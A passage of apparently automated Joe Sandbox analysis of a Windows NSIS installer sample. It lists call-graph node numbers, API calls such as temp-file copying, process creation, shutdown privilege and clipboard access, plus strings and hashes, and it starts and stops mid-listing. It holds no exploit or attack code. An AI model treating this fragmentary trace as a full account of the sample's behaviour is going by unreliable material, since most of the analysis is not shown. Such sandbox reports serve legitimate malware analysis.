3753->3732 3754->3738 3756 405fb7 lstrlenA 3755->3756 3757 405f90 lstrcmpiA 3756->3757 3758 405fbf 3756->3758 3757->3758 3759 405fae CharNextA 3757->3759 3758->3746 3758->3747 3759->3756 4636 40551a 4637 40552a 4636->4637 4638 40553e 4636->4638 4639 405530 4637->4639 4640 405587 4637->4640 4641 405546 IsWindowVisible 4638->4641 4647 40555d 4638->4647 4643 4044ec SendMessageW 4639->4643 4642 40558c CallWindowProcW 4640->4642 4641->4640 4644 405553 4641->4644 4645 40553a 4642->4645 4643->4645 4646 404e5b 5 API calls 4644->4646 4646->4647 4647->4642 4648 404edb 4 API calls 4647->4648 4648->4640 4649 401d1c 4650 402d89 21 API calls 4649->4650 4651 401d22 IsWindow 4650->4651 4652 401a25 4651->4652 4653 40149e 4654 4023a2 4653->4654 4655 4014ac PostQuitMessage 4653->4655 4655->4654 3214 401ba0 3215 401bf1 3214->3215 3216 401bad 3214->3216 3218 401bf6 3215->3218 3219 401c1b GlobalAlloc 3215->3219 3217 401c36 3216->3217 3222 401bc4 3216->3222 3221 40655e 21 API calls 3217->3221 3232 4023a2 3217->3232 3218->3232 3252 406521 lstrcpynW 3218->3252 3233 40655e 3219->3233 3223 40239c 3221->3223 3250 406521 lstrcpynW 3222->3250 3253 405b81 3223->3253 3225 401c08 GlobalFree 3225->3232 3227 401bd3 3251 406521 lstrcpynW 3227->3251 3230 401be2 3257 406521 lstrcpynW 3230->3257 3248 406569 3233->3248 3234 4067b0 3235 4067c9 3234->3235 3280 406521 lstrcpynW 3234->3280 3235->3217 3237 406781 lstrlenW 3237->3248 3241 40667a GetSystemDirectoryW 3241->3248 3242 40655e 15 API calls 3242->3237 3243 406690 GetWindowsDirectoryW 3243->3248 3244 40655e 15 API calls 3244->3248 3245 406722 lstrcatW 3245->3248 3248->3234 3248->3237 3248->3241 3248->3242 3248->3243 3248->3244 3248->3245 3249 4066f2 SHGetPathFromIDListW CoTaskMemFree 3248->3249 3258 4063ef 3248->3258 3263 406915 GetModuleHandleA 3248->3263 3269 4067cf 3248->3269 3278 406468 wsprintfW 3248->3278 3279 406521 lstrcpynW 3248->3279 3249->3248 3250->3227 3251->3230 3252->3225 3255 405b96 3253->3255 3254 405be2 3254->3232 3255->3254 3256 405baa MessageBoxIndirectW 3255->3256 3256->3254 3257->3232 3281 40638e 3258->3281 3261 406423 RegQueryValueExW RegCloseKey 3262 406453 3261->3262 3262->3248 3264 406931 3263->3264 3265 40693b GetProcAddress 3263->3265 3285 4068a5 GetSystemDirectoryW 3264->3285 3267 40694a 3265->3267 3267->3248 3268 406937 3268->3265 3268->3267 3276 4067dc 3269->3276 3270 406857 CharPrevW 3274 406852 3270->3274 3271 406845 CharNextW 3271->3274 3271->3276 3272 406878 3272->3248 3274->3270 3274->3272 3275 406831 CharNextW 3275->3276 3276->3271 3276->3274 3276->3275 3277 406840 CharNextW 3276->3277 3288 405e1d 3276->3288 3277->3271 3278->3248 3279->3248 3280->3235 3282 40639d 3281->3282 3283 4063a1 3282->3283 3284 4063a6 RegOpenKeyExW 3282->3284 3283->3261 3283->3262 3284->3283 3286 4068c7 wsprintfW LoadLibraryExW 3285->3286 3286->3268 3289 405e23 3288->3289 3290 405e39 3289->3290 3291 405e2a CharNextW 3289->3291 3290->3276 3291->3289 3308 403fa1 3309 403fb9 3308->3309 3310 40411a 3308->3310 3309->3310 3311 403fc5 3309->3311 3312 40412b GetDlgItem GetDlgItem 3310->3312 3318 40416b 3310->3318 3315 403fd0 SetWindowPos 3311->3315 3316 403fe3 3311->3316 3313 4044a0 22 API calls 3312->3313 3317 404155 SetClassLongW 3313->3317 3314 4041c5 3326 404115 3314->3326 3381 4044ec 3314->3381 3315->3316 3320 403fec ShowWindow 3316->3320 3321 40402e 3316->3321 3322 40140b 2 API calls 3317->3322 3318->3314 3325 401389 2 API calls 3318->3325 3327 404107 3320->3327 3328 40400c GetWindowLongW 3320->3328 3323 404036 DestroyWindow 3321->3323 3324 40404d 3321->3324 3322->3318 3330 404429 3323->3330 3331 404052 SetWindowLongW 3324->3331 3332 404063 3324->3332 3333 40419d 3325->3333 3403 404507 3327->3403 3328->3327 3329 404025 ShowWindow 3328->3329 3329->3321 3330->3326 3339 40445a ShowWindow 3330->3339 3331->3326 3332->3327 3336 40406f GetDlgItem 3332->3336 3333->3314 3337 4041a1 SendMessageW 3333->3337 3335 40442b DestroyWindow KiUserCallbackDispatcher 3335->3330 3340 404080 SendMessageW IsWindowEnabled 3336->3340 3341 40409d 3336->3341 3337->3326 3338 40140b 2 API calls 3349 4041d7 3338->3349 3339->3326 3340->3326 3340->3341 3343 4040aa 3341->3343 3346 4040f1 SendMessageW 3341->3346 3347 4040bd 3341->3347 3354 4040a2 3341->3354 3342 40655e 21 API calls 3342->3349 3343->3346 3343->3354 3345 4044a0 22 API calls 3345->3349 3346->3327 3350 4040c5 3347->3350 3351 4040da 3347->3351 3348 4040d8 3348->3327 3349->3326 3349->3335 3349->3338 3349->3342 3349->3345 3372 40436b DestroyWindow 3349->3372 3384 4044a0 3349->3384 3397 40140b 3350->3397 3353 40140b 2 API calls 3351->3353 3355 4040e1 3353->3355 3400 404479 3354->3400 3355->3327 3355->3354 3357 404252 GetDlgItem 3358 404267 3357->3358 3359 40426f ShowWindow KiUserCallbackDispatcher 3357->3359 3358->3359 3387 4044c2 KiUserCallbackDispatcher 3359->3387 3361 404299 EnableWindow 3366 4042ad 3361->3366 3362 4042b2 GetSystemMenu EnableMenuItem SendMessageW 3363 4042e2 SendMessageW 3362->3363 3362->3366 3363->3366 3366->3362 3388 4044d5 SendMessageW 3366->3388 3389 403f82 3366->3389 3392 406521 lstrcpynW 3366->3392 3368 404311 lstrlenW 3369 40655e 21 API calls 3368->3369 3370 404327 SetWindowTextW 3369->3370 3393 401389 3370->3393 3372->3330 3373 404385 CreateDialogParamW 3372->3373 3373->3330 3374 4043b8 3373->3374 3375 4044a0 22 API calls 3374->3375 3376 4043c3 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3375->3376 3377 401389 2 API calls 3376->3377 3378 404409 3377->3378 3378->3326 3379 404411 ShowWindow 3378->3379 3380 4044ec SendMessageW 3379->3380 3380->3330 3382 404504 3381->3382 3383 4044f5 SendMessageW 3381->3383 3382->3349 3383->3382 3385 40655e 21 API calls 3384->3385 3386 4044ab SetDlgItemTextW 3385->3386 3386->3357 3387->3361 3388->3366 3390 40655e 21 API calls 3389->3390 3391 403f90 SetWindowTextW 3390->3391 3391->3366 3392->3368 3395 401390 3393->3395 3394 4013fe 3394->3349 3395->3394 3396 4013cb MulDiv SendMessageW 3395->3396 3396->3395 3398 401389 2 API calls 3397->3398 3399 401420 3398->3399 3399->3354 3401 404480 3400->3401 3402 404486 SendMessageW 3400->3402 3401->3402 3402->3348 3404 4045ca 3403->3404 3405 40451f GetWindowLongW 3403->3405 3404->3326 3405->3404 3406 404534 3405->3406 3406->3404 3407 404561 GetSysColor 3406->3407 3408 404564 3406->3408 3407->3408 3409 404574 SetBkMode 3408->3409 3410 40456a SetTextColor 3408->3410 3411 404592 3409->3411 3412 40458c GetSysColor 3409->3412 3410->3409 3413 4045a3 3411->3413 3414 404599 SetBkColor 3411->3414 3412->3411 3413->3404 3415 4045b6 DeleteObject 3413->3415 3416 4045bd CreateBrushIndirect 3413->3416 3414->3413 3415->3416 3416->3404 4656 402621 4657 402dab 21 API calls 4656->4657 4658 402628 4657->4658 4661 406011 GetFileAttributesW CreateFileW 4658->4661 4660 402634 4661->4660 4669 4025a3 4679 402deb 4669->4679 4672 402d89 21 API calls 4673 4025b6 4672->4673 4674 4025d2 RegEnumKeyW 4673->4674 4675 4025de RegEnumValueW 4673->4675 4677 402933 4673->4677 4676 4025f3 RegCloseKey 4674->4676 4675->4676 4676->4677 4680 402dab 21 API calls 4679->4680 4681 402e02 4680->4681 4682 40638e RegOpenKeyExW 4681->4682 4683 4025ad 4682->4683 4683->4672 4684 4015a8 4685 402dab 21 API calls 4684->4685 4686 4015af SetFileAttributesW 4685->4686 4687 4015c1 4686->4687 4688 401fa9 4689 402dab 21 API calls 4688->4689 4690 401faf 4689->4690 4691 4055a6 28 API calls 4690->4691 4692 401fb9 4691->4692 4693 405b04 2 API calls 4692->4693 4694 401fbf 4693->4694 4695 4069c0 5 API calls 4694->4695 4698 402933 4694->4698 4700 401fe2 CloseHandle 4694->4700 4697 401fd4 4695->4697 4697->4700 4701 406468 wsprintfW 4697->4701 4700->4698 4701->4700 4702 40202f 4703 402dab 21 API calls 4702->4703 4704 402036 4703->4704 4705 406915 5 API calls 4704->4705 4706 402045 4705->4706 4707 402061 GlobalAlloc 4706->4707 4708 4020d1 4706->4708 4707->4708 4709 402075 4707->4709 4710 406915 5 API calls 4709->4710 4711 40207c 4710->4711 4712 406915 5 API calls 4711->4712 4713 402086 4712->4713 4713->4708 4717 406468 wsprintfW 4713->4717 4715 4020bf 4718 406468 wsprintfW 4715->4718 4717->4715 4718->4708 4719 40252f 4720 402deb 21 API calls 4719->4720 4721 402539 4720->4721 4722 402dab 21 API calls 4721->4722 4723 402542 4722->4723 4724 40254d RegQueryValueExW 4723->4724 4726 402933 4723->4726 4725 40256d 4724->4725 4727 402573 RegCloseKey 4724->4727 4725->4727 4730 406468 wsprintfW 4725->4730 4727->4726 4730->4727 4731 4021af 4732 402dab 21 API calls 4731->4732 4733 4021b6 4732->4733 4734 402dab 21 API calls 4733->4734 4735 4021c0 4734->4735 4736 402dab 21 API calls 4735->4736 4737 4021ca 4736->4737 4738 402dab 21 API calls 4737->4738 4739 4021d4 4738->4739 4740 402dab 21 API calls 4739->4740 4741 4021de 4740->4741 4742 40221d CoCreateInstance 4741->4742 4743 402dab 21 API calls 4741->4743 4744 40223c 4742->4744 4743->4742 4745 401423 28 API calls 4744->4745 4746 4022fb 4744->4746 4745->4746 4747 403bb1 4748 403bbc 4747->4748 4749 403bc0 4748->4749 4750 403bc3 GlobalAlloc 4748->4750 4750->4749 4758 401a35 4759 402dab 21 API calls 4758->4759 4760 401a3e ExpandEnvironmentStringsW 4759->4760 4761 401a52 4760->4761 4762 401a65 4760->4762 4761->4762 4763 401a57 lstrcmpW 4761->4763 4763->4762 4769 4023b7 4770 4023c5 4769->4770 4771 4023bf 4769->4771 4773 4023d3 4770->4773 4774 402dab 21 API calls 4770->4774 4772 402dab 21 API calls 4771->4772 4772->4770 4775 402dab 21 API calls 4773->4775 4777 4023e1 4773->4777 4774->4773 4775->4777 4776 402dab 21 API calls 4778 4023ea WritePrivateProfileStringW 4776->4778 4777->4776 4779 4014b8 4780 4014be 4779->4780 4781 401389 2 API calls 4780->4781 4782 4014c6 4781->4782 4783 402439 4784 402441 4783->4784 4785 40246c 4783->4785 4787 402deb 21 API calls 4784->4787 4786 402dab 21 API calls 4785->4786 4789 402473 4786->4789 4788 402448 4787->4788 4791 402dab 21 API calls 4788->4791 4793 402480 4788->4793 4794 402e69 4789->4794 4792 402459 RegDeleteValueW RegCloseKey 4791->4792 4792->4793 4795 402e7d 4794->4795 4797 402e76 4794->4797 4795->4797 4798 402eae 4795->4798 4797->4793 4799 40638e RegOpenKeyExW 4798->4799 4800 402edc 4799->4800 4801 402eec RegEnumValueW 4800->4801 4805 402f0f 4800->4805 4809 402f86 4800->4809 4802 402f76 RegCloseKey 4801->4802 4801->4805 4802->4809 4803 402f4b RegEnumKeyW 4804 402f54 RegCloseKey 4803->4804 4803->4805 4806 406915 5 API calls 4804->4806 4805->4802 4805->4803 4805->4804 4808 402eae 6 API calls 4805->4808 4807 402f64 4806->4807 4807->4809 4810 402f68 RegDeleteKeyW 4807->4810 4808->4805 4809->4797 4810->4809 4811 40173a 4812 402dab 21 API calls 4811->4812 4813 401741 SearchPathW 4812->4813 4814 40175c 4813->4814 4815 401d3d 4816 402d89 21 API calls 4815->4816 4817 401d44 4816->4817 4818 402d89 21 API calls 4817->4818 4819 401d50 GetDlgItem 4818->4819 4820 40263d 4819->4820 4821 406c3f 4823 406ac3 4821->4823 4822 40742e 4823->4822 4824 406b44 GlobalFree 4823->4824 4825 406b4d GlobalAlloc 4823->4825 4826 406bc4 GlobalAlloc 4823->4826 4827 406bbb GlobalFree 4823->4827 4824->4825 4825->4822 4825->4823 4826->4822 4826->4823 4827->4826

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 4034fc-40354e SetErrorMode GetVersionExW 1 403550-403580 GetVersionExW 0->1 2 403588-40358d 0->2 1->2 3 403595-4035d7 2->3 4 40358f 2->4 5 4035d9-4035e1 call 406915 3->5 6 4035ea 3->6 4->3 5->6 12 4035e3 5->12 7 4035ef-403603 call 4068a5 lstrlenA 6->7 13 403605-403621 call 406915 * 3 7->13 12->6 20 403632-403696 #17 OleInitialize SHGetFileInfoW call 406521 GetCommandLineW call 406521 13->20 21 403623-403629 13->21 28 403698-40369a 20->28 29 40369f-4036b3 call 405e1d CharNextW 20->29 21->20 26 40362b 21->26 26->20 28->29 32 4037ae-4037b4 29->32 33 4036b8-4036be 32->33 34 4037ba 32->34 35 4036c0-4036c5 33->35 36 4036c7-4036ce 33->36 37 4037ce-4037e8 GetTempPathW call 4034cb 34->37 35->35 35->36 39 4036d0-4036d5 36->39 40 4036d6-4036da 36->40 44 403840-40385a DeleteFileW call 403082 37->44 45 4037ea-403808 GetWindowsDirectoryW lstrcatW call 4034cb 37->45 39->40 42 4036e0-4036e6 40->42 43 40379b-4037aa call 405e1d 40->43 47 403700-403739 42->47 48 4036e8-4036ef 42->48 43->32 61 4037ac-4037ad 43->61 66 403860-403866 44->66 67 403a47-403a57 ExitProcess OleUninitialize 44->67 45->44 64 40380a-40383a GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4034cb 45->64 49 403756-403790 47->49 50 40373b-403740 47->50 54 4036f1-4036f4 48->54 55 4036f6 48->55 58 403792-403796 49->58 59 403798-40379a 49->59 50->49 56 403742-40374a 50->56 54->47 54->55 55->47 62 403751 56->62 63 40374c-40374f 56->63 58->59 65 4037bc-4037c9 call 406521 58->65 59->43 61->32 62->49 63->49 63->62 64->44 64->67 65->37 72 40386c-403877 call 405e1d 66->72 73 4038ff-403906 call 403bf3 66->73 70 403a59-403a69 call 405b81 ExitProcess 67->70 71 403a7d-403a83 67->71 74 403b01-403b09 71->74 75 403a85-403a9b GetCurrentProcess OpenProcessToken 71->75 87 4038c5-4038cf 72->87 88 403879-4038ae 72->88 83 40390b-40390f 73->83 84 403b0b 74->84 85 403b0f-403b13 ExitProcess 74->85 81 403ad1-403adf call 406915 75->81 82 403a9d-403acb LookupPrivilegeValueW AdjustTokenPrivileges 75->82 97 403ae1-403aeb 81->97 98 403aed-403af8 ExitWindowsEx 81->98 82->81 83->67 84->85 92 4038d1-4038df call 405ef8 87->92 93 403914-40393a call 405aec lstrlenW call 406521 87->93 90 4038b0-4038b4 88->90 94 4038b6-4038bb 90->94 95 4038bd-4038c1 90->95 92->67 107 4038e5-4038fb call 406521 * 2 92->107 110 40394b-403963 93->110 111 40393c-403946 call 406521 93->111 94->95 100 4038c3 94->100 95->90 95->100 97->98 102 403afa-403afc call 40140b 97->102 98->74 98->102 100->87 102->74 107->73 114 403968-40396c 110->114 111->110 116 403971-40399b wsprintfW call 40655e 114->116 120 4039a4 call 405acf 116->120 121 40399d-4039a2 call 405a75 116->121 125 4039a9-4039ab 120->125 121->125 126 4039e7-403a06 SetCurrentDirectoryW call 4062e1 CopyFileW 125->126 127 4039ad-4039b7 GetFileAttributesW 125->127 135 403a45 126->135 136 403a08-403a29 call 4062e1 call 40655e call 405b04 126->136 128 4039d8-4039e3 127->128 129 4039b9-4039c2 DeleteFileW 127->129 128->114 132 4039e5 128->132 129->128 131 4039c4-4039d6 call 405c2d 129->131 131->116 131->128 132->67 135->67 144 403a2b-403a35 136->144 145 403a6f-403a7b CloseHandle 136->145 144->135 146 403a37-403a3f call 40687e 144->146 145->135 146->116 146->135
                                                    APIs
                                                    • SetErrorMode.KERNELBASE ref: 0040351F
                                                    • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040354A
                                                    • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 0040355D
                                                    • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 004035F6
                                                    • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403633
                                                    • OleInitialize.OLE32(00000000), ref: 0040363A
                                                    • SHGetFileInfoW.SHELL32(00420EC8,00000000,?,000002B4,00000000), ref: 00403659
                                                    • GetCommandLineW.KERNEL32(00428A20,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040366E
                                                    • CharNextW.USER32(00000000,00434000,00000020,00434000,00000000,?,00000008,0000000A,0000000C), ref: 004036A7
                                                    • GetTempPathW.KERNEL32(00000400,C:\Users\user~1\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037DF
                                                    • GetWindowsDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037F0
                                                    • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 004037FC
                                                    • GetTempPathW.KERNEL32(000003FC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403810
                                                    • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,Low), ref: 00403818
                                                    • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403829
                                                    • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user~1\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403831
                                                    • DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403845
                                                    • lstrlenW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,00434000,00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040391E
                                                      • Part of subcall function 00406521: lstrcpynW.KERNEL32(?,?,00000400,0040366E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040652E
                                                    • wsprintfW.USER32 ref: 0040397B
                                                    • GetFileAttributesW.KERNEL32(0042C800,C:\Users\user~1\AppData\Local\Temp\), ref: 004039AE
                                                    • DeleteFileW.KERNEL32(0042C800), ref: 004039BA
                                                    • SetCurrentDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\), ref: 004039E8
                                                      • Part of subcall function 004062E1: MoveFileExW.KERNEL32(?,?,00000005,00405DDF,?,00000000,000000F1,?,?,?,?,?), ref: 004062EB
                                                    • CopyFileW.KERNEL32(00437800,0042C800,00000001,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 004039FE
                                                      • Part of subcall function 00405B04: CreateProcessW.KERNEL32(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,0042C800,?), ref: 00405B2D
                                                      • Part of subcall function 00405B04: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405B3A
                                                      • Part of subcall function 0040687E: FindFirstFileW.KERNELBASE(771B3420,00425F58,00425710,00405F41,00425710,00425710,00000000,00425710,00425710,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405C4D,?,771B3420,C:\Users\user~1\AppData\Local\Temp\), ref: 00406889
                                                      • Part of subcall function 0040687E: FindClose.KERNEL32(00000000), ref: 00406895
                                                    • ExitProcess.KERNEL32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A47
                                                    • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A4C
                                                    • ExitProcess.KERNEL32 ref: 00403A69
                                                    • CloseHandle.KERNEL32(00000000,0042D000,0042D000,?,0042C800,00000000), ref: 00403A70
                                                    • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A8C
                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403A93
                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA8
                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403ACB
                                                    • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AF0
                                                    • ExitProcess.KERNEL32 ref: 00403B13
                                                      • Part of subcall function 00405ACF: CreateDirectoryW.KERNELBASE(?,00000000,004034EF,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00405AD5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID: File$Process$Exit$CloseDirectory$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                    • String ID: 1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache$C:\Users\user\Desktop$Error launching installer$Genetics Announcements Mess Premier Appliance Structures $Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                                    • API String ID: 2017177436-3924495301
                                                    • Opcode ID: 6f167a7f0a94b31442c0d7b54e5ff144a867fa91205ea93a415c56c3114bea8b
                                                    • Instruction ID: bee44f309595f2ff458e9cecae568de25c9667724a66d0f49069eb89ae1a0629
                                                    • Opcode Fuzzy Hash: 6f167a7f0a94b31442c0d7b54e5ff144a867fa91205ea93a415c56c3114bea8b
                                                    • Instruction Fuzzy Hash: FDF10170204301ABD720AF659D05B2B3EE8EB8570AF11483EF581B62D1DB7DCA45CB6E

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 149 4056e5-405700 150 405706-4057cd GetDlgItem * 3 call 4044d5 call 404e2e GetClientRect GetSystemMetrics SendMessageW * 2 149->150 151 40588f-405896 149->151 172 4057eb-4057ee 150->172 173 4057cf-4057e9 SendMessageW * 2 150->173 153 4058c0-4058cd 151->153 154 405898-4058ba GetDlgItem CreateThread FindCloseChangeNotification 151->154 156 4058eb-4058f5 153->156 157 4058cf-4058d5 153->157 154->153 161 4058f7-4058fd 156->161 162 40594b-40594f 156->162 159 405910-405919 call 404507 157->159 160 4058d7-4058e6 ShowWindow * 2 call 4044d5 157->160 169 40591e-405922 159->169 160->156 167 405925-405935 ShowWindow 161->167 168 4058ff-40590b call 404479 161->168 162->159 165 405951-405957 162->165 165->159 174 405959-40596c SendMessageW 165->174 170 405945-405946 call 404479 167->170 171 405937-405940 call 4055a6 167->171 168->159 170->162 171->170 178 4057f0-4057fc SendMessageW 172->178 179 4057fe-405815 call 4044a0 172->179 173->172 180 405972-40599d CreatePopupMenu call 40655e AppendMenuW 174->180 181 405a6e-405a70 174->181 178->179 188 405817-40582b ShowWindow 179->188 189 40584b-40586c GetDlgItem SendMessageW 179->189 186 4059b2-4059c7 TrackPopupMenu 180->186 187 40599f-4059af GetWindowRect 180->187 181->169 186->181 191 4059cd-4059e4 186->191 187->186 192 40583a 188->192 193 40582d-405838 ShowWindow 188->193 189->181 190 405872-40588a SendMessageW * 2 189->190 190->181 194 4059e9-405a04 SendMessageW 191->194 195 405840-405846 call 4044d5 192->195 193->195 194->194 196 405a06-405a29 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 194->196 195->189 198 405a2b-405a52 SendMessageW 196->198 198->198 199 405a54-405a68 GlobalUnlock SetClipboardData CloseClipboard 198->199 199->181
                                                    APIs
                                                    • GetDlgItem.USER32(?,00000403), ref: 00405743
                                                    • GetDlgItem.USER32(?,000003EE), ref: 00405752
                                                    • GetClientRect.USER32(?,?), ref: 0040578F
                                                    • GetSystemMetrics.USER32(00000002), ref: 00405796
                                                    • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B7
                                                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C8
                                                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057DB
                                                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E9
                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057FC
                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040581E
                                                    • ShowWindow.USER32(?,00000008), ref: 00405832
                                                    • GetDlgItem.USER32(?,000003EC), ref: 00405853
                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405863
                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040587C
                                                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405888
                                                    • GetDlgItem.USER32(?,000003F8), ref: 00405761
                                                      • Part of subcall function 004044D5: SendMessageW.USER32(00000028,?,00000001,00404300), ref: 004044E3
                                                    • GetDlgItem.USER32(?,000003EC), ref: 004058A5
                                                    • CreateThread.KERNELBASE(00000000,00000000,Function_00005679,00000000), ref: 004058B3
                                                    • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004058BA
                                                    • ShowWindow.USER32(00000000), ref: 004058DE
                                                    • ShowWindow.USER32(?,00000008), ref: 004058E3
                                                    • ShowWindow.USER32(00000008), ref: 0040592D
                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405961
                                                    • CreatePopupMenu.USER32 ref: 00405972
                                                    • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405986
                                                    • GetWindowRect.USER32(?,?), ref: 004059A6
                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059BF
                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F7
                                                    • OpenClipboard.USER32(00000000), ref: 00405A07
                                                    • EmptyClipboard.USER32 ref: 00405A0D
                                                    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A19
                                                    • GlobalLock.KERNEL32(00000000), ref: 00405A23
                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A37
                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00405A57
                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00405A62
                                                    • CloseClipboard.USER32 ref: 00405A68
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
